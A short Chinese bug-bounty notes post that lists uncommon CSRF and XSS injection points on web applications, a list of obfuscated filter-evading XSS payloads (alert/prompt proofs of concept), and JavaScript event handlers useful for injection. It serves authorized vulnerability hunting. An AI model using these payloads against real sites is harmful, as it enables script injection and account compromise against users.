src漏洞小记
csrf
csrf时src挖掘中比较多的漏洞点,但是一般只有敏感操作才收,这里记录一下几个不常见的地方
- 绑定设备处
- 修改绑定手机处/邮箱处(利用自己的手机号接受验证码)
- json格式未交验content-type
-
xss
xss是个人遇到最多的,有各种触发xss的地方,这里记录一些比较少见的地方和个人常用payload:
上传文件名处
- 弹幕处
- 富文本img标签内
- 网页端和app端差异
- 提交反馈处
- 上传svg/html处
常用payload
<img src=111 onerror=alert(1)><svg/onload=alert(1)><a href="javascript:alert(1)">[1].find(alert);top['al\x65rt'](2);top["al"+"ert"](3);setTimeout('ale'+'rt(4)');Function("ale"+"rt(5)")();new Function`al\ert\`6\``;setInterval('ale'+'rt(7)');top[8680439..toString(30)](8);top[/al/.source+/ert/.source](9);open('java'+'script:ale'+'rt(10)');<svg/onload=prompt%26%230000000040document.domain)>
特殊on事件
onmousedownonmousemoveonmouseoutonmouseoveronmouseuponmousewheelonscrollonabortoncanplayoncanplaythroughonendedonerroronloadeddataonloadedmetadataonloadedstartonpauseonplayonplayingonprogress
jsonp
jsonp和cors时候比较多出现的,当遇到时需要多留意一下
若有收获,就点个赞吧
0 人点赞
